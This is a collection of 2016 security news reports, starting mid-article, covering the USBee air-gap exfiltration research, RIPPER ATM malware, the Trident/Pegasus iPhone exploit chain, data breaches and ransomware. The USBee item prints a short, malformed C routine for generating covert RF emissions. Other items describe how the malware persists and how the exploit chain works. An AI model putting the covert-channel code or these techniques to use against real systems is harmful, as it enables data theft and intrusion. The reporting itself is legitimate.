“Most attacks are short-lived, with the median duration just over 2 minutes, and 75 percent of attacks shorter than 5 minutes.”

“The use of IoT devices in botnets is not new, but as they become more common, we expect these types of botnets to increase in number and power,” Level 3 said in a blog post. “The security of IoT devices poses a significant threat. Vendors of these devices must work to improve their security to combat this growing threat. ”

USBee exfiltrates data from air-Gapped networks via electromagnetic emission from USB

1.9.2016 securityaffeirs Virus

A group of Israeli researchers has devised a new technique dubbed USBee to hack air-gapped networks and exfiltrate information.
Mordechai Guri, head of R&D at Ben-Gurion’s Cyber Security Center and the chief scientist officer at Morphisec Endpoint Security, and his team have devised a new technique dubbed USBee to hack air-gapped networks and exfiltrate information.

This time, the Israel researchers exploited covert-channel via electromagnetic emission from USB. The USBee technique leverages USB connectors implanted with RF transmitters to steal sensitive data.

In this scenario, the USBee application is installed on a compromised computer. The attacker exploits a USB thumb drive already connected to the computer and establish a short-range RF transmission modulated with data. On the other end of the communication, the data transmitted are received by a nearby receiver and decoded.


“In recent years researchers have demonstrated how attackers could use USB connectors implanted with RF transmitters to exfiltrate data from secure, and even air-gapped, computers (e.g., COTTONMOUTH in the leaked NSA ANT catalog). Such methods require a hardware modification of the USB plug or device, in which a dedicated RF transmitter is embedded.” reads the introduction to the paper published by the experts. “In this paper we present USBee, a software that can utilize an unmodified USB device connected to a computer as a RF transmitter. We demonstrate how a software can intentionally generate controlled electromagnetic emissions from the data bus of a USB connector. We also show that the emitted RF signals can be controlled and modulated with arbitrary binary data. We implement a prototype of USBee, and discuss its design and implementation details including signal generation and modulation. We evaluate the transmitter by building a receiver and demodulator using GNU Radio. Our evaluation shows that USBee can be used for transmitting binary data to a nearby receiver at a bandwidth of 20 to 80 BPS (bytes per second).”

The researchers discovered that the transmission of a sequence of ‘0’ bits to a USB port generates a detectable emission between 240ℎ and 480ℎ. The researchers exploited this mechanism by sending data from the compromised computer to a USB device in order to generate controllable EMR that can carry modulated data. The researcher used a nearby RF receiver to receive the EMR and decode the information.

Guri and his team were able to exfiltrate 80 bytes per second using this technique, a transmission speed that could an attacker to send out a 4,096-bit crypto key in less than 10 seconds, very interesting when hacking air-gapped networks if compared with other hacking techniques.

The experts explained that it is possible to create a basic carrier wave using this algorithm:

inline static void fill_buffer_freq
(u32 *buf, int size, double freq)
int i = 0;
u32 x = 0;
double t = freq / 4800 * 2;
for (i = 0, x = 0x00000000; i<size*8; i++)
x = x<<1;
if ((int)(i*t)%2==0)
*(buf++) = x;
The transmission starts when the application writes the fill_buffer_freq to an arbitrary data block in the USB device, the application just requires the permission to create a file on the device.

“The actual data transmission is done by writing the byte pattern generated by fill_buffer_freq to an arbitrary data block or stream in the USB device. For our purposes, we used a temporary file within the USB thumb drive’s file system. The transmission process doesn’t require special privileges (e.g., root or admin). It only requires permission to create a file on the removable device.” reads the paper.

The researchers also published a video PoC of the attack that shows how the data is exfiltrated by a laptop with a $30 radio antenna from around 15 feet away.

Spotify resets users’ passwords due to data breaches suffered by other firms

1.9.2016 securityaffeirs Hacking

In response to the numerous data breaches suffered by other services, the music streaming service Spotify forced a password reset for a number of users.
In the last months, numerous IT companies suffered a major data breach, including Dropbox, LinkedIn, MySpace, VK.com, and Tumblr. The criminal underground is flooded by login credentials from the above services that offered for sales by hackers.

These credentials could be used by hackers to target other services online and take over users’accounts, this is possible because users’ bad habit to share same usernames and passwords among different web services.


In response to the amazing string of data breaches, the music streaming service Spotify decided to force a password reset for a number of users. The company clarified that the measure was taken in response to the incident occurred to other firms and are not related to any problem occurred in its systems.


To protect your Spotify account, we’ve reset your password. This is because we believe it may have been compromised during a leak on another service with which you use the same password.” states a message sent via email to its users on Wednesday reads.

“Don’t worry! This is purely a preventative security measure. Nobody has accessed your Spotify account, and your data is secure,”

Spotify allows users to easily create a new password by simply clicking on a link.

In April, hundreds of Spotify account credentials appeared online on the website Pastebin, the information includes emails, usernames, passwords, account type and other details.

The popular Swedish streaming service denied any data breach and confirmed that its systems weren’t compromised by hackers. The company confirmed that it “has not been hacked” and its “user records are secure.”

“Spotify has not been hacked and our user records are secure. We monitor Pastebin and other sites regularly. When we find Spotify credentials, we first verify that they are authentic, and if they are, we immediately notify affected users to change their passwords.” states Spotify.

According to the Techcrunch media agency, the company security team proactively resets hacked passwords, meanwhile, a number of users are also reported problems with their accounts.

FBI flash alert says foreign hackers compromised state election systems

31.8.2016 securityaffeairs Hacking

The FBI issued a “flash” alert to election officials across the country confirming that foreign hackers have compromised state election systems in two states.
The FBI confirmed that foreign hackers have penetrated state election systems, federal experts have uncovered evidence of the intrusion. The hackers penetrated the databases of two state election systems in the last weeks, in response, the FBI issued a “flash” alert to election officials across the country inviting them to adopt security measured to protect their computer systems.

“The FBI warning, contained in a “flash” alert from the FBI’s Cyber Division, a copy of which was obtained by Yahoo News, comes amid heightened concerns among U.S. intelligence officials about the possibility of cyberintrusions, potentially by Russian state-sponsored hackers, aimed at disrupting the November elections.” reported Yahoo News that obtained a copy of the “flash” alert.

The alert does not provide details about the states that suffered the attacks, but according to Yahoo News, sources familiar with the document say it refers voter registration databases in Arizona and Illinois.

US authorities fear possible cyber attacks launched by nation-state actors like Russians that could have serious consequences on the result of the next Presidential Election.

The Homeland Security Secretary Jeh Johnson had a conference call with state election officials on Aug. 15 to offer all the necessary support to secure state election systems.

The DHS will provide cybersecurity experts to scan the voting systems searching for vulnerabilities that could be exploited by hackers.

“The government is offering to help states protect the Nov. 8 U.S. election from hacking or other tampering, in the face of allegations by Republican Party presidential candidate Donald Trump that the system is open to fraud.” reported the Reuters.

“Homeland Security Secretary Jeh Johnson told state officials in a phone call on Monday that federal cyber security experts could scan for vulnerabilities in voting systems and provide other resources to help protect against infiltration, his office said in a statement.”

Back to the FBI flash alert, titled “Targeting Activity Against State Board of Election Systems,” it was labeled as restricted for “NEED TO KNOW recipients.”

FBI alert state election systems

The warning confirms that the bureau was investigating cyber intrusions against two state election websites that occurred recently that lead to the exfiltration of voter registration data.

The FBI alert contains technical details about the attacks, including IP addresses involved in the both attacks.

“The FBI is requesting that states contact their Board of Elections and determine if any similar activity to their logs, both inbound and outbound, has been detected,” the alert reads. “Attempts should not be made to touch or ping the IP addresses directly.”

The TTPs adopted by attackers suggest the involvement of Russian hackers, one of the IP addresses included in the alert has surfaced before in Russian criminal underground hacker forums.

Menzel, the Illinois election official, confirmed that FBI is investigating a possible link to the Democratic National Committee hack and the attacks against the two state election systems.

The RIPPER malware linked to the recent ATM attacks in Thailand
31.8.2016 securityaffeairs Virus

Experts from FireEye who analyzed the RIPPER malware believe it was used by crooks in the recent wave of cyber attacks against ATM in Thailand.
Earlier this month a malware was used by a criminal organization to steal 12 million baht from ATMs in Thailand.

According to FireEye, the malware was uploaded for the first time to the online scanning service VirusTotal on Aug. 23, 2016. The malicious code was uploaded from an IP address in Thailand a few minutes the cyber heist was reported by media.

Experts from FireEye who analyzed the malware, dubbed RIPPER because researchers found the “ATMRIPPER” name in the sample, revealed that it implemented techniques not seen before.

Hackers belonging to a cybercrime gang from Eastern Europe have stolen over 12 Million Baht (approximately US$346,000) from a 21 ATMs in Thailand.

The Central Bank of Thailand (BoT) has issued a warning to all the banks operating in the country about security vulnerabilities that plague roughly 10,000 ATMs. It seems that hackers exploited such flaws to steal cash from the ATMs. The same gang was involved in similar attacks against top eight banks in Taiwan. In Taiwan, the thieves have stolen NT$70 Million ($2.2 Million) in cash forcing the banks to shut down hundreds of their cash machines.

The warning issued by the Central Bank of Thailand follows the decision of the Government Savings Bank (GSB) to shut down roughly 3,000 ATMs of its 7,000 machines in response to a recent wave of attacks that targeted its machines.

According to FireEye, the RIPPER malware borrows multiple features from other ATM malware:

Targets the same ATM brand.
The technique used to expel currency follows the same strategy (already documented) performed by the Padpin (Tyupkin),SUCEFUL and GreenDispenser.
Similar to SUCEFUL, it is able to control the Card Reader device to Read or Eject the card on demand.
Can disable the local network interface, similar to capabilities of the Padpin family.
Uses the “sdelete” secure deletion tool, similar to GreenDispenser, to remove forensic evidence.
Enforces a limit of 40 bank notes per withdrawal consistently, which is the maximum allowed by the ATM vendor.
The RIPPER malware also implements new features, for example, it was designed to target three of the main ATM Vendors worldwide, which is a first.

The RIPPER malware interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip, with this mechanism crooks authenticate themselves to the cash machine. This mechanism is uncommon, the Skimmer use this method too.

In order to gain persistence, the RIPPER malware uses either a standalone service or masquerade itself as a legitimate ATM process.

When the RIPPER is installed as a service, it first killk the process “dbackup.exe”, then replaces it with its binary, then it installs the persistent service “DBackup Service.”

“RIPPER can stop or start the “DBackup Service” with the following arguments:

“service start” or “service stop”

RIPPER also supports the following command line switches:

/autorun: Will Sleep for 10 minutes and then run in the background, waiting for interaction.

/install: RIPPER will replace the ATM software running on the ATM as follows:

Upon execution, RIPPER will kill the processes running in memory for the three targeted ATM Vendors via the native Windows “taskkill” tool.

RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself. This technique allows the malware to maintain the legitimate program name to avoid suspicion.” continues FireEye.

When RIPPER malware is executed without any parameters, it performs a series of actions, such as connecting with the local peripherals (i.e. Cash Dispenser, Card Reader, and the Pinpad).

Then the threat detects a card with a malicious EMV chip it starts a timer to allow a crook to control the ATM via the Pinpad.

The crooks can perform multiple malicious actions, including clear logs and shut down the ATM local network interface.

Back to the Thailand attacks, below are reported similarities between the RIPPER malware and the malicious code used by the gang.

Ripper malware thailand cases

Minecraft World Map data breach, 71,000 accounts leaked online
31.8.2016 securityaffeairs Hacking

The popular security expert Troy Hunt reported some 71,000 user accounts and IP addresses have been leaked from the website Minecraft World Map.
Another data breach affects the gaming industry, this time, 71,000 Minecraft World Map accounts has been leaked online after the ‘hack.’

Some 71,000 user accounts and IP addresses have been leaked from Minecraft fan website Minecraft World Map.

The Minecraft World Map site is very popular withing the Minecraft gaming community, gamers can use the web property to share the worlds they have built.

The popular security expert reported Troy Hunt reported the data dumps that include 71,000 user accounts and IP addresses.

Have I been pwned? @haveibeenpwned
New breach: Minecraft World Map had 71k user accounts hacked in Jan. 55% were already in @haveibeenpwned https://haveibeenpwned.com
03:30 - 29 Ago 2016
35 35 Retweet 13 13 Mi piace
Exposed records include email addresses, IP address data, login credentials for the popular site Minecraft World Map, Troy Hunt clarified that passwords included in the dumps were salted and hashed.

Minecraft World Map website hacked

A rapid check allowed the Australian expert to verify that more than half of the compromised accounts were already listed in its online service haveibeenpwned.com that allows users to discover if they have an account that has been compromised in a data breach.

According to the experts, the website Minecraft World Map was breached in January 2016, but the incident was not publicly reported.

“In approximately January 2016, the Minecraft World Map site designed for sharing maps created for the game was hacked and over 71k user accounts were exposed. The data included usernames, email and IP addresses along with salted and hashed passwords.

Compromised data: Email addresses, IP addresses, Passwords, Usernames” Hunt wrote on his website.

Users have to reset their passwords on the Minecraft World Map and on any other website that shares the same login credentials.

This is the last incident occurred in the gaming industry disclosed online, recently security vulnerabilities in the vBulletin platform have exposed more than 27 million accounts, many of them belonging to gamers on mail.ru.

Giving a close look to the compromised mail.ru accounts they belong from CFire, parapa.mail.ru (ParaPa Dance City game), and tanks.mail.ru (Ground War: Tank game).

Lurk cybercrime Gang developed, maintained and rent the Angler EK
31.8.2016 securityaffeairs Crime

Experts from Kaspersky Lab confirmed that the Lurk cybercrime Gang developed, maintained and rent the infamous Angler Exploit Kit.
Security experts from Kaspersky Lab have confirmed that the Lurk cybercrime group are the author of the infamous Angler exploit kit. The members of the Lurk cybercrime crew were arrested by Russian law enforcement this summer, according to the experts they also offered for rent the Angler exploit kit that after the arrest disappeared from the exploit landscape.

Law enforcement arrested suspects in June, authorities accused them of stealing around $45 million USD from Russian financial institutions by using the Lurk banking trojan.

According to the Cisco Talos researchers, after the arrests of the individuals behind the Lurk banking trojan, it has been observed a rapid disappearance of the Angler EK in the wild.

Malware researchers confirmed that the overall traffic related to other EKs shows a drastic fall, around 96% since early April.

The Angler and Nuclear exploit kits rapidly disappeared, likely due to the operations conducted by the law enforcement in the malware industry.

A joint investigation conducted by the Russian Police and the Kaspersky Lab allowed the identification of the individuals behind the Lurk malware. The experts now confirmed that the Lurk group was also responsible for developing and maintaining the Angler exploit kit, that they called “XXX.”

Experts from Kaspersky published a blog post that details how the security firm helped law enforcement in catching the Lurk cybercrime group.

The experts explained that the Lurk gang started renting the Angler Exploit Kit after their fraudulent activities became less profitable.

“In addition to increasing the number of “minor” attacks, the cybercriminals were trying to solve their cash flow problem by “diversifying” the business and expanding their field of activity. This included developing, maintaining and renting the Angler exploit pack (also known as XXX). Initially, this was used mainly to deliver Lurk to victims’ computers. But as the number of successful attacks started to decline, the owners began to offer smaller groups paid access to the tools.”

“Judging by what we saw on Russian underground forums for cybercriminals, the Lurk gang had an almost legendary status,” reads the post. “So when Lurk provided other cybercriminals with access to Angler, the exploit pack became especially popular – a ‘product’ from the top underground authority did not need advertising.”

Lurk first appeared on the scene in 2011 when its activities were first spotted by Kaspersky experts. Kaspersky initially determined the Lurk cybercrime group was composed of roughly 15 people. Across the years the number of members of the criminal gang increased to 40.

lurk cybercrime gang

Kaspersky also provided an estimation of the cost for the Lurk infrastructure that reached tens of thousands of dollars per month.

“The criminal group had an extensive and extremely costly network infrastructure, so, in addition to employees’ salaries, it was necessary to pay for renting servers, VPN and other technical tools. Our estimates suggest that the network infrastructure alone cost the Lurk managers tens of thousands of dollars per month.” continues the post.

Saudi government facilities hit by cyber attacks, Saudi cyber experts convened

31.8.2016 securityaffeairs Hacking

Saudi government facilities have been hit cyber attacks, the Government is investigating with the support of Saudi cyber experts.
Saudi government facilities have been targeted by major cyber attacks, in response, the Government has convened a group of cyber experts to examine the events.

According to the Saudi Press Agency, Saudi cyber experts held urgent talks on Tuesday after the cyber attack “in recent weeks targeted government institutions and vital installations in the kingdom.”

At the time I was writing there is no information about targeted agencies neither the alleged threat actor behind the cyber attacks against Saudi infrastructure.

FILE- In this Monday, Oct. 6, 2003 file photo, Saudi Arabian capital Riyadh with the 'Kingdom Tower' photographed through a window of the 'Al-Faislia Tower' in the Saudi Arabian capital Riyadh. Saudi Arabia�s stock exchange has opened up to direct foreign investment for the first time. The decision to open up the Tadawul stock exchange on Monday comes at a crucial time for Saudi Arabia, whose revenue has taken a hit from the plunge in oil prices over the past year. The kingdom is the world�s largest exporter of crude. (AP Photo/Markus Schreiber, File)
(AP Photo/Markus Schreiber, File)

The Saudi cyber security experts were involved in the investigation and according to the Saudi Press Agency, the kingdom’s Cybersecurity Centre “held an urgent workshop with a number of parties” to discuss the results of its investigations.

The attacks were launched from abroad, attackers targeted Saudi websites with a spyware to steal sensitive information from the targets.

This isn’t the first time that Saudi websites were hit by cyber attacks, in June hackers attacked a major Saudi newspaper and gained its control to publish fake news.

The Saudi cyber experts analyzed the attacks and proposed the necessary countermeasures to defeat the threat and protect the information targeted by the hackers.

Experts exposed the “necessary procedures to fix and to protect those sites”, reported the Saudi Press Agency.

The most clamorous attack against Saudi government facilities occurred in 2012 when a virus infected 30,000 workstations of one of the world’s largest energy companies, the Saudi Aramco.

iOS 9.3.4 and minor versions are vulnerable to the Trident Exploit

31.8.2016 securityaffeairs iOS

Its name is the Trident: a chain of zero-day exploits that aim to infect iPhone with commercial spyware. Researchers linked it to the NSO group.
Its name is the Trident: a chain of zero-day exploits that aim to infect iPhone with commercial spyware.
Researchers say it’s belonging to an exploit infrastructure connected to the NSO group.

Trident NGO iphone exploit

Thanks to the great work made by the researchers from the Citizenlab organization and the Lookout firm that responsibly disclosed the exploits and their related vulnerabilities to Apple.
Given the severity of the Trident, Apple worked extremely quickly to patch these vulnerabilities and it has released iOS 9.3.5 to address them.

In this post, we want to give you a description and some technical information about the inner logic of the Trident exploit instead of the attack received by Ahmed Mansoor.
With the episode of Ahmed Mansoor we can quickly understand the infection vector of that exploit: SMS, email, social media, or any other message.

The most scaring part of that attack is that the single action the user have to do to trigger this dangerous attack is just a click on an external link.
The exploit seems to contain the logic to remote jailbreak an iPhone to install arbitrary applications and then deliver a commercial spyware called Pegasus as an espionage software to track the victim.

What is Pegasus and who is behind it?

Pegasus is a spy software installable on iOS devices that allow reading messages, emails, passwords and address lists as well as eavesdropping on phone calls, making and transmitting audio recordings and tracking the location on a compromised device (but we will look better in the following section).
It seems that this spyware is attributed to NSO Group, an Israeli firm based in Herzliya in the country’s “Silicon Valley”.

This spyware was attributed to the NSO Group because in the Mansoor’s attack the domain used for the phishing message (webdav.co) belongs to a network of domains that is a part of an exploit infrastructure provided by the company NSO Group.

NSO Group, now owned by US private equity firm Francisco Partners Management, has flown far under the radar, without even a website.

The Citizenlab reported that just opening the link included in the message sent to the victims with an iPhone version 9.3.3 it is possible to observe an active unknown software that was remotely implanted into the system through the delivery of unknown exploits from that link.
The complex exploit takes the name as Trident.

After the user get baited the exploit start his work to infect the phone, following the 3 main stages of that attack, better detailed here:

Delivery and WebKit vulnerability
This stage comes down over the initial URL in the form of an HTML file that exploits a vulnerability (CVE-2016-4655) in WebKit (used in Safari and other browsers).
CVE-2016-4655: Memory Corruption in Safari WebKit
A memory corruption vulnerability exists in Safari WebKit that allows an attacker to execute arbitrary code. Pegasus exploits this vulnerability to obtain initial code execution privileges within the context of the Safari web browser.

This stage is downloaded from the first stage code based on the device type (32-bit vs 64- bit). Stage 2 is downloaded as an obfuscated and encrypted package. Each package is encrypted with unique keys at each download, making traditional network-based controls ineffective. It contains the code that is needed to exploit the iOS Kernel (CVE-2016-4656 and CVE-2016-4657) and a loader that downloads and decrypts a package for stage 3.

CVE-2016-4656: Kernel Information Leak Circumvents KASLR
Before Pegasus can execute its jailbreak, it must determine where the kernel is located in memory. Kernel Address Space Layout Randomization (KASLR) makes this task difficult by mapping the kernel into different and unpredictable locations in memory. In short, before attacking the kernel, Pegasus has to find it. The attacker has found a way to locate the kernel by using a function call that leaks a non-obfuscated kernel memory address in the return value, allowing the kernel’s actual memory location to be mapped.
CVE-2016-4657: Memory Corruption in Kernel leads to Jailbreak
The third vulnerability in Pegasus’ Trident is the one that is used to jailbreak the phone. A memory corruption vulnerability in the kernel is used to corrupt memory in both the 32- and 64-bit versions. The exploits are performed differently on each version.

Espionage software:
This stage is downloaded by stage 2 and is also based on the device type (32-bit vs 64-bit). Stage 3 contains the espionage software, daemons, and other processes that are used after the device has been jailbroken in stage 2. Stage 3 installs the hooks into the applications the attacker wishes to spy on. Additionally, stage 3 detects if the device was previously jailbroken through another method and, if so, removes any access to the device that the jailbreak provides, such as via SSH. The software also contains a failsafe to remove itself if certain conditions are present.
Jailbreak Persistence

Once the kernel has been exploited, both exploits perform similar tasks to prepare the system to be jailbroken:
• Disable kernel security protections including code signing
• Remount the system partition
• Clear the Safari caches (to help cover their tracks)
• Write the jailbreak files (including the main loader as /sbin/mount_nfs)
As a final step of stage 2, the exploit removes /etc/nfs.conf which triggers the file to load /sbin/mount_nfs (which is the stage 3 jailbreakloader). Because /sbin/mount_nfs is run as root, the code is run with full privileges. After stage 3 will be unpacked, Pegasus need to gain persistence on device reboot. So exploit replaces the system daemon rtbuddyd with a copy of the jsc binary and creates a link to a script that is similar to the exploit for CVE-2016-4655 .


“Pegasus is one of the most sophisticated pieces of surveillance and espionage software” stated Lookout company. It has a novel mechanism to install and hide itself and obtain persistence on the system. Once it is resident, it uses a number of ways to hide its communications and protect itself from discovery, and it hooks into a large number of the phone’s functions in order to gather data and intercept messages and calls.

Following we will list all the features Pegasus have to spy on the victim a fully detailed list with references of source code):

Persistence: JSC Privilege Escalation
Disabling Updates
Jailbreak Detection
Device Monitoring (Current Reachability, Sim and cell network information, Call info, SIM/Network change notification)
Stealth Update to Command & Control Infrastructure
Self Destruction
Steal Calendar
Steal Contacts
Steal GPS location
Capturing User Passwords
WiFi and Router Passwords
Interception of Calls and Messages
Following an image of an infected phone by Pegasus compared to a normal one:

Trident NGO iphone exploit 2
Image from lookup.com


NSO Group reportedly has hundreds of employees and makes millions of dollars in annual revenue, effectively as a cyber arms dealer, from the sale of its sophisticated mobile attack software.

We strongly recommend to all iPhone owners to update to the latest version of iOS (9.3.5) immediately.

Dropbox Hacked — More Than 68 Million Account Details Leaked Online
31.8.2016 thehackernews Hacking

Hackers have obtained credentials for more than 68 Million accounts for online cloud storage platform Dropbox from a known 2012 data breach.
Dropbox has confirmed the breach and already notified its customers of a potential forced password resets, though the initial announcement failed to specify the exact number of affected users.
However, in a selection of files obtained through sources in the database trading community and breach notification service Leakbase, Motherboard found around 5GB of files containing details on 68,680,741 accounts, which includes email addresses and hashed (and salted) passwords for Dropbox users.
An unnamed Dropbox employee verified the legitimacy of the data.
Out of 68 Million, almost 32 Million passwords are secured using the strong hashing function "BCrypt," making difficult for hackers to obtain users' actual passwords, while the rest of the passwords are hashed with the SHA-1 hashing algorithm.
These password hashes also believed to have used a Salt – a random string added to the hashing process to further strengthen passwords in order to make it more difficult for hackers to crack them.
"We've confirmed that the proactive password reset we completed last week covered all potentially impacted users," said Patrick Heim, Head of Trust and Security for Dropbox.
"We initiated this reset as a precautionary measure so that the old passwords from prior to mid-2012 can’t be used to improperly access Dropbox accounts. We still encourage users to reset passwords on other services if they suspect they may have reused their Dropbox password."
Dropbox initially disclosed the data breach in 2012, notifying users that one of its employee passwords was acquired and used to access a file with users’ email addresses, but the company didn't disclose that the hackers were able to pilfer passwords too.
But earlier this week, Dropbox sent out emails alerting its users that a large chunk of its users’ credentials was obtained in 2012 data breach that may soon be seen on the Dark Web marketplace, prompting them to change their password if they hadn't changed since mid-2012.
"Our security teams are always watching out for new threats to our users. As part of these ongoing efforts, we learned about an old set of Dropbox user credentials (email addresses plus hashed and salted passwords) that we believe were obtained in 2012," the company wrote. "Our analysis suggests that the credentials relate to an incident we disclosed around that time."
Dropbox is the latest to join the list of "Mega-Breaches," that revealed this summer, when hundreds of Millions of online credentials from years-old data breaches on popular social network sites, including LinkedIn, MySpace, VK.com and Tumblr, were sold on Dark Web.
The takeaway:
Change your passwords for Dropbox as well as other online accounts immediately, especially if you use the same password for multiple websites.
Also use a good password manager to create complex passwords for different sites as well as remember them. We have listed some best password managers that could help you understand the importance of password manager and choose one according to your requirement.

Linux servers hit with FairWare ransomware – or is it just a scam?

30.8.2016 nethelpsecurity

Users posting on Bleeping Computer’s forums have alerted the world to a new threat targeting Linux server admins: the FairWare ransomware.

Whether the ransomware actually exists or not is still up for debate, as we only have the attackers’ claim that they are using it. It’s perfectly possible that they managed to compromise servers – apparently, through a brute-force SSH attack – and simply deleted the data they claim to have stolen.

Victims of the attack find their web folder deleted, and in its place a ransom note pointing them to an online paste.

There, they find the ransom note, saying that their server has been infected with “a ransomware variant called FAIRWARE,” that they have two weeks to send 2 Bitcoin to a specified address, and that they can contact the attackers via email, but should not expect to see proof that the attackers have the stolen files:

FairWare ransomware ransom note

This definitely adds to the suspicion that they might have simply deleted the files in question and, even if the victims pay, they might not get them back.

“Most ransomware developers dont just delete files as it would quickly be found out and noone would pay the ransom,” Bleeping Computer’s Lawrance Abrams noted.

“Its possible they gzipped the www folders, uploaded it, and then deleted it. Unfortunately, wont know unless you email them.”

So far, the attackers’ Bitcoin address has yet to show evidence of a ransom payment. This threat is very recent, and the two week payment deadline is still far off, so victims are likely still trying to discover whether paying the ransom will bring their files back and are looking for answers online.

The son of a Russian lawmaker could face up to 40 years in the jail for hacking
30.8.2016 securityaffeairs Hacking

Roman Seleznev (32), the son of the Russian lawmaker and Russian Parliament member Valery Seleznev was convicted of stealing 2.9 Million credit card numbers
Roman Seleznev (32), the son of one of the most notorious Russian lawmaker and Russian Parliament member Valery Seleznev has been convicted in the US of hacking businesses and stealing 2.9 million US credit card numbers using Point-of-Sale (POS) malware

“A federal jury today convicted a Vladivostok, Russia, man of 38 counts related to his scheme to hack into point-of-sale computers to steal and sell credit card numbers to the criminal underworld, announced Assistant Attorney General Leslie R. Caldwell of the Justice Department’s Criminal Division and U.S. Attorney Annette L. Hayes of the Western District of Washington. ” reads the announcement published by the DoJ.

According to the Department of Justice, the hacking scheme defrauded banks of more than $169 Million. The stolen credit card data were offered for sale on multiple “carding” websites.

“Testimony at trial revealed that Seleznev’s scheme caused 3,700 financial institutions more than $169 million in losses.” continues the note published by the DoJ.


Seleznev, who was using the online moniker ‘Track2‘ was convicted in a Washington court on Thursday of 38 charges related to stolen credit card details, which includes:

Ten counts of Wire Fraud
Nine counts of obtaining information from a Protected Computer
Nine counts of possession of 15 Unauthorized Devices
Eight counts of Intentional Damage to a Protected Computer
Two counts of Aggravated Identity Theft
“Roman Valerevich Seleznev, aka Track2, 32, was convicted after an eight-day trial of 10 counts of wire fraud, eight counts of intentional damage to a protected computer, nine counts of obtaining information from a protected computer, nine counts of possession of 15 or more unauthorized access devices and two counts of aggravated identity theft. U.S. District Judge Richard A. Jones of the Western District of Washington scheduled sentencing for Dec. 2, 2016.”

Roman Seleznev, 32, the son of Russian Parliament member Valery Seleznev, was arrested in 2014 while attempting to board a flight in the Maldives, the arrest raised diplomatic tensions between American and Russian authorities.

The prosecution was built starting from data found on his laptop that was seized at the time of the arrest. The PC contained more than 1.7 million stolen credit card numbers, some of which were stolen from businesses in Western Washington.

The analysis of the laptop allowed the prosecutors to find additional evidence linking Seleznev to the servers, email accounts and financial transactions involved in the hacking scheme.

The prosecution was criticized by the Seleznev’s lawyer, John Henry Browne.

“I don’t know of any case that has allowed such outrageous behavior,” said Browne.

The US DoJ replied that Seleznev “was prosecuted for his conduct not his nationality.”

If convicted, Seleznev could face up to 40 years in the jail, his victims were small businesses and retailers hacked from 2008 to 2014.

Seleznev will be sentenced on December 2.

Shad0wS3C group hacked the Paraguay Secretary of National Emergency
30.8.2016 securityaffeairs Hacking

Shad0wS3C hacker group has hacked the Paraguay’s Secretary of National Emergency (SNE) and leaked online a dump from a PostgreSQL database.
Not so long ago I interviewed Gh0s7, the leader of the Shad0wS3C hacker crew, now he contacted me to announce the hack of the Paraguay’s Secretary of National Emergency (SNE).

“The reason for this data leak. The government of Paraguay has violated so many human rights, and either the UN (Don’t rely on them) or anyone has done anything. just to name a few:

Impunity and justice system
Torture and other ill-treatment
Violation of Women’s and girls’ rights
Violation against Human rights defenders”
this is the Shad0wS3C message.

Shad0w Security manifesto

The group has shared as proof of the hack a data dump from a PostgreSQL database, just after the announced security breach the Government website sen.gov.py was up.

The leaked data dump includes information about material stocks and also PII belonging to Paraguay’s Secretary of National Emergency employees. Users’ records include names, emails, phone numbers, addresses, salary information, and other data related to their activity within the Government organization (i.e Roles in the case of national emergencies).

Shad0wS3c hack SNE

The leaked data also includes details on hundreds website login credentials, with hashed passwords.

Shad0wS3c is a hacker group recently formed, in July it claimed responsibility for the data breach of the EJBCA that resulted in the exposure of credentials and certificates.

Spam and phishing in Q2 2016
30.8.2016 Kaspersky Spam

Spam: quarterly highlights

The year of ransomware in spam

Although the second quarter of 2016 has only just finished, it’s safe to say that this is already the year of ransomware Trojans. By the end of Q2 there was still a large number of emails with malicious attachments, most of which download ransomware in one way or other to a victim’s computer. However, in the period between 1 June and 21 June the proportion of these emails decreased dramatically.

The majority of malicious attachments were distributed in ZIP archives. The decline can therefore be clearly seen in the following graph showing spam with ZIP attachments that arrived in our traps:

Spam and phishing in Q2 2016

Number of emails with ZIP archives, Q2 2016

In addition to the decline, June saw another interesting feature: this sort of spam was not sent out on Saturdays or Sundays.

The same situation could be observed in KSN: the number of email antivirus detections dropped sharply on 1 June and grew on 22 June.

Spam and phishing in Q2 2016

Number of email antivirus detections by day, Q2 2016

This decline was caused by a temporary lull in activity by the Necurs botnet, which is mostly used to distribute this type of malicious spam. After the botnet resumed its activity, the spam email template changed, and the malicious attachments became even more sophisticated.

As in the previous quarter, the spam messages were mainly notifications about bills, invoices or price lists that were supposedly attached to the email. The attachments actually contained a Trojan downloader written in Javascript, and in most cases the malware loaded the Locky encryptor.

Spam and phishing in Q2 2016

For example, some emails (see the screenshot above) contained an attachment with a Trojan downloader. When run, it downloaded Trojan-Ransom.Win32.Locky.agn, which encrypts the data on a victim’s computer and demands a ransom, to be paid in bitcoin.


The second quarter saw spammers continue to mask links using various Unicode ranges designed for specific purposes. This tactic became especially popular in 2015, and is still widely used by spammers.

Spam and phishing in Q2 2016

The link in this example looks like this:

Spam and phishing in Q2 2016

If you transfer the domain from UTF-8 into the more familiar HTML, it becomes . The characters, which look quite ordinary, in fact belong to the Mathematical Alphanumeric Symbols UTF range used in highly specific mathematical formulas, and are not intended for use in plain text or hyperlinks. The dot in the domain is also unusual: it is the fullwidth full stop used in hieroglyphic languages. The rest of the hyperlink, as well as the rest of the text in these spam messages, is written using the Latin alphabet.

Spam in APT attacks

In Q2, we came across a number of APT attacks in the corporate sector. Emails were made to look as if they came from representatives of the targeted company, and contained a request to immediately transfer money to a specific account. The text was fairly plausible and hinted at a personal acquaintance and previous communication. In some cases, the emails included the logo of the attacked company. All the messages conveyed a sense of urgency (“ASAP”, “urgent”, “must be completed today”) – scammers often use this trick in an attempt to catch people off guard, so that they act rather than think.

Below is an example:

Hello NNNNN,

How are you doing! Are you available at the office? I need you to process an overdue payment that needs to be paid today.



The emails were sent selectively – to individual employees, usually connected to the finance department. The knowledge shown by the scammers suggests the attack was carefully prepared.

The most suspicious aspect of the attack was the domain used in the ‘From’ field – myfirm.moby – that differed from the corporate one. Perhaps the attackers hope that some email clients only show the sender’s name by default, while concealing the address.

It is not that difficult to write any domain in the ‘From’ field, and in the future we can expect more well-prepared attacks.

Sporting events in spam

